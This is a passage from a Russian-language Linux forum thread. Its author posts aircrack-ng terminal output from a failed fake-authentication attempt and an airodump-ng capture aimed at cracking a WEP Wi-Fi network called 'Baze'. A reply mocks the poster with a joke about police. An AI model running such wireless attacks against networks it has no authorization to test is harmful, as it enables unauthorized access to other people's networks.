No source MAC (-h) specified. Using the device MAC (20:B8:9F:AD:98:D1)
10:51:37  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 3

10:51:38  Sending Authentication Request (Open System)

10:51:40  Sending Authentication Request (Open System)

10:51:42  Sending Authentication Request (Open System)

10:51:44  Sending Authentication Request (Open System)

10:51:46  Sending Authentication Request (Open System)

10:51:48  Sending Authentication Request (Open System)

10:51:50  Sending Authentication Request (Open System)

10:51:52  Sending Authentication Request (Open System)

10:51:54  Sending Authentication Request (Open System)

10:51:56  Sending Authentication Request (Open System)

10:51:58  Sending Authentication Request (Open System)

10:52:00  Sending Authentication Request (Open System)

10:52:02  Sending Authentication Request (Open System)

10:52:04  Sending Authentication Request (Open System)

10:52:06  Sending Authentication Request (Open System)

10:52:08  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

root@adr-laptop:~#
ADR
() автор топика
Ответ на: комментарий от ADR

не знаю почему но вайфай пропал ... снова ... все необходимые модули являются 

adr@adr-laptop:~$ sudo ifconfig wlan0 up
wlan0: ERROR while getting interface flags: No such device
adr@adr-laptop:~$ cat /proc/modules | grep -i br
brcmsmac 582674 0 - Live 0x00000000
brcmutil 16885 1 brcmsmac, Live 0x00000000
mac80211 264750 1 brcmsmac, Live 0x00000000
cfg80211 166959 2 brcmsmac,mac80211, Live 0x00000000
crc_ccitt 12595 1 brcmsmac, Live 0x00000000

ADR
() автор топика

#ctrl + c

root@adr-laptop:/home/adr# airodump-ng mon0 -c 3 --bssid XX:XX:XX:XX:XX:X2 -w wifiCrack/Baze.out

CH 3 ][ Elapsed: 16 s ][ 2011-11-06 13:53 ][ fixed channel mon0: -1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID XX:XX:XX:XX:XX:X2 -87 8 27 0 0 3 54e. WEP WEP Baze BSSID STATION PWR Rate Lost Frames Probe #ctrl + c

ух ты какой затейник!

пативэн уже выехал за вами!

havelite
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Security